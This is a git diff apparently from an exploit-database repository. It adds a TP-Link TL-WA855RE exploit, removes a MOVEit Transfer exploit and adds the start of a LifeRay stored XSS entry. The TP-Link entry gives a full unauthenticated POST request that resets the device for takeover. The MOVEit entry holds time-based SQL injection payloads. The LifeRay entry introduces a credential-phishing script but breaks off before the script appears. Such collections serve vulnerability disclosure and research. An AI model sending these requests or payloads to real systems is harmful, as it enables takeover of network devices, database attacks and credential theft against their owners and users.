diff --git a/exploits/hardware/webapps/49092.txt b/exploits/hardware/webapps/49092.txt new file mode 100644 index 000000000..fddb43849 --- /dev/null +++ b/exploits/hardware/webapps/49092.txt @@ -0,0 +1,28 @@ +# Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass +# Date: 2020/07/29 +# Exploit Author: malwrforensics +# Vendor Homepage: https://tp-link.com +# Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip +# Version: TL-WA855RE(US)_V5_200415 +# Tested on: N/A +# CVE : 2020-24363 +Important: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware + +Details +By default the web interface of the TL-WA855RE wireless extender require users to log in in order to access the admin interface. However, an attacker, on the same network, can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device. +To test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password. + +POST /?code=5&asyn=0 HTTP/1.1 +Host: +Content-Length: 7 +Accept: text/plain, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 +Content-Type: text/plain;charset=UTF-8 +Origin: http:// +Referer: http:// +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +0|1,0,0 \ No newline at end of file diff --git a/exploits/multiple/webapps/48855.txt b/exploits/multiple/webapps/48855.txt deleted file mode 100644 index fbcd18c0d..000000000 --- a/exploits/multiple/webapps/48855.txt +++ /dev/null @@ -1,34 +0,0 @@ -# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection -# Google Dork: inurl:human.aspx intext:moveit -# Date: 2020-10-05 -# Exploit Author: Aviv Beniash -# Vendor Homepage: https://www.ipswitch.com/ -# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1 -# CVE : CVE-2019-16383 -# -# Related Resources: -# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability -# https://nvd.nist.gov/vuln/detail/CVE-2019-16383 - -# Description: -# The API call for revoking logon tokens is vulnerable to a -# Time based blind SQL injection via the 'token' parameter - -# MSSQL payload: - -POST /api/v1/token/revoke HTTP/1.1 -Host: moveittransferstg -Content-Type: application/x-www-form-urlencoded -Content-Length: 32 - -token='; WAITFOR DELAY '0:0:10'-- - - -# MySQL payload: - -POST /api/v1/token/revoke HTTP/1.1 -Host: moveittransferstg -Content-Type: application/x-www-form-urlencoded -Content-Length: 21 - -token=' OR SLEEP(10); \ No newline at end of file diff --git a/exploits/multiple/webapps/49091.txt b/exploits/multiple/webapps/49091.txt new file mode 100644 index 000000000..f8867cee8 --- /dev/null +++ b/exploits/multiple/webapps/49091.txt @@ -0,0 +1,31 @@ +# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS +# Date: 10/05/2020 +# Exploit Author: 3ndG4me +# Vendor Homepage: https://www.liferay.com/ +# Software Link: https://www.liferay.com/ +# Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED) +# Tested on: Debian Linux +# CVE : CVE-2020-7934 +# Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 + +# NOTE: The attached proof of concept is a javascript payload, +submitted as a ".txt" file to attach via email as ".js" is often +blocked. + +// CVE-2020-7934 Cred Phishing Example Attack +// Author: 3ndG4me +// Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 + +// Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant: +//